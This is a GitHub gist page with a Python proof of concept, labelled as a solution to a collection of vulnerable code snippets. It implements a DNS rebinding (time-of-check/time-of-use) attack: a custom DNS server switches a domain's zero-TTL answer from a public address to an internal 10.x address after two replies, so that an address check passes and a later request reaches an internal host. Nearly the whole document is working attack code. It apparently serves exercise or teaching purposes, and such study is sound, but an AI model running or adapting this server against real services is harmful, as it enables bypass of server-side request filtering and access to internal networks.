Created
May 12, 2024 10:12
-
-
Save 2S1one/309d46d7bfc4b25f7c224a51679a3cb9 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# TOU TOC - POC | |
# Roy H. | |
# Solution for https://github.com/2S1one/vulnerable-code-snippets | |
# Updated for more reliability | |
import binascii | |
import copy | |
import socket | |
import struct | |
import sys | |
import time | |
from dnslib import DNSRecord, RR, QTYPE, RCODE | |
from dnslib.server import DNSServer, BaseResolver, DNSLogger | |
from dnslib.label import DNSLabel | |
DOMAIN = "abirabirtest.com." | |
class CustomDNSLogger(DNSLogger): | |
def __init__(self, log_prefix, log_suffix): | |
super().__init__(log_prefix, log_suffix) | |
self.reply_counter = 0 | |
def log_recv(self, handler, data): | |
try: | |
request = DNSRecord.parse(data) | |
if str(request.q.qname) == DOMAIN: | |
super().log_recv(handler, data) | |
except Exception as e: | |
pass # Ignore parse errors and do not log them | |
def log_send(self, handler, data): | |
try: | |
response = DNSRecord.parse(data) | |
if str(response.q.qname) == DOMAIN: | |
super().log_send(handler, data) | |
except Exception as e: | |
pass # Ignore parse errors and do not log them | |
def log_request(self, handler, request): | |
if str(request.q.qname) == DOMAIN: | |
super().log_request(handler, request) | |
def log_reply(self, handler, reply): | |
if str(reply.q.qname) == DOMAIN: | |
self.reply_counter += 1 | |
super().log_reply(handler, reply) | |
print(self.reply_counter) | |
def log_truncated(self, handler, reply): | |
if str(reply.q.qname) == DOMAIN: | |
super().log_truncated(handler, reply) | |
def log_error(self, handler, e): | |
super().log_error(handler, e) | |
class InterceptResolver(BaseResolver): | |
def __init__(self, intercept_1, intercept_2, fallback_dns='8.8.8.8', port=53): | |
self.switcher = 0 | |
self.ttl = 0 | |
self.zone_1 = [] | |
self.zone_2 = [] | |
self.fallback_dns = fallback_dns | |
self.fallback_port = port | |
for i in intercept_1: | |
for rr in RR.fromZone(i, ttl=self.ttl): | |
self.zone_1.append((rr.rname, QTYPE[rr.rtype], rr)) | |
for i in intercept_2: | |
for rr in RR.fromZone(i, ttl=self.ttl): | |
self.zone_2.append((rr.rname, QTYPE[rr.rtype], rr)) | |
print('TOU TOUC - Created Switching Zone') | |
print('zone_1', self.zone_1) | |
print('zone_2', self.zone_2) | |
def resolve(self, request, handler): | |
reply = request.reply() | |
qname = request.q.qname | |
if str(qname) == DOMAIN: | |
if self.switcher < 2: | |
zone = self.zone_1 | |
else: | |
zone = self.zone_2 | |
# Increment switcher and reset if it reaches 4 | |
self.switcher = (self.switcher + 1) % 4 | |
for name, rtype, rr in zone: | |
a = copy.copy(rr) | |
a.rname = qname | |
reply.add_answer(a) | |
else: | |
try: | |
if handler.protocol == 'udp': | |
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
else: | |
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
sock.settimeout(1) | |
sock.connect((self.fallback_dns, self.fallback_port)) | |
sock.send(bytearray(request.pack())) | |
data = sock.recv(1024) | |
reply = DNSRecord.parse(data) | |
except Exception as e: | |
print(f"Failed to forward DNS request: {e}") | |
finally: | |
sock.close() | |
return reply | |
if __name__ == '__main__': | |
my_address = '0.0.0.0' | |
my_port = 53 | |
my_resolver_1 = [f'{DOMAIN} 300 IN A 1.0.0.1'] | |
my_resolver_2 = [f'{DOMAIN} 300 IN A 10.28.85.66'] | |
resolver = InterceptResolver(my_resolver_1, my_resolver_2) | |
logger = CustomDNSLogger('request,reply,truncated,error', False) | |
udp_server = DNSServer(resolver, port=my_port, address=my_address, logger=logger) | |
udp_server.start_thread() | |
while udp_server.isAlive(): | |
time.sleep(0.1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment